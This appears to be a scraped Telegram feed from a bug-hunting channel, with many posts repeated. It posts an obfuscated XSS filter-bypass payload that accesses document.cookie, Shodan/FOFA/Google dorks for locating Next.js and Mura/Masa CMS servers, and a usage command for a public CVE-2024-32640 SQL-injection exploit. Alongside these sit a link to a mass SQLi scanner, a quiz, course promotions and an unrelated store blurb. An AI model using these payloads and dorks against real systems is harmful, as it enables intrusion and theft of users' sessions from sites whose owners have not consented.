🚨CVE-2024-34351:Next.js SSRF in Server Actions🚨
📢 Security researchers at Assetnote have identified a SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
📝Dorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
🔗PoC: https://lnkd.in/gKbjiHVY
⚠Stay vigilant and take necessary precautions to protect your applications.
📢 Security researchers at Assetnote have identified a SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
📝Dorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
🔗PoC: https://lnkd.in/gKbjiHVY
⚠Stay vigilant and take necessary precautions to protect your applications.
❤2🎄1
demo.gif
10.9 MB
🚨SQLMC - SQL Injection Massive Checker🚨
📢SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
🔗Download https://github.com/malvads/sqlmc
📢SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
🔗Download https://github.com/malvads/sqlmc
👍8
Bypass XSS Filter with Array
Payload :
Payload :
<nonoscript><p noscript="</nonoscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">👍6
A ____ is used to connect to a remote system using NetBIOS.
Final Results
46%
NULL session
13%
Hash
10%
Rainbow table
41%
Rootkit
👍1
Brut Security
A ____ is used to connect to a remote system using NetBIOS.
Answer is NULL Session
👍5😐2
🚨Muraider - Automating the detection & Exploitation of CVE-2024-32640 SQLi in Mura/Masa CMS🚨
⚠Usage- python3 CVE-2024-32640.py --url https://target.com
👉Dorks-
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
🔗Link- https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
👉References:
https://buff.ly/3WKUzc9
https://buff.ly/3WJh1SY
📢For Live Class Enrollment DM in Whatsapp- https://buff.ly/3wOME2W
📝Join Our Telegram- https://buff.ly/3yi0H1o
📝Join Our Community- https://zurl.co/6G4I
⚠Usage- python3 CVE-2024-32640.py --url https://target.com
👉Dorks-
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
🔗Link- https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
👉References:
https://buff.ly/3WKUzc9
https://buff.ly/3WJh1SY
📢For Live Class Enrollment DM in Whatsapp- https://buff.ly/3wOME2W
📝Join Our Telegram- https://buff.ly/3yi0H1o
📝Join Our Community- https://zurl.co/6G4I
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
👍3🔥2
📢 Take the 30-Day Bug Hunting Challenge!
🚨 Get ready to put your skills to the test! The challenge will be starting from June 1st.
👉 Anyone can participate in the challenge by joining our community. This is a self-help goal challenge where you will need to dedicate yourself for 30 days until you successfully find a bug and report it.
🔗 Join the Brut Security Community on Nas.io now: https://nas.io/brutsecurity
📝 For Enquiries DM us in WhatsApp: https://wa.me/918945971332
🚨 Get ready to put your skills to the test! The challenge will be starting from June 1st.
👉 Anyone can participate in the challenge by joining our community. This is a self-help goal challenge where you will need to dedicate yourself for 30 days until you successfully find a bug and report it.
🔗 Join the Brut Security Community on Nas.io now: https://nas.io/brutsecurity
📝 For Enquiries DM us in WhatsApp: https://wa.me/918945971332
👎2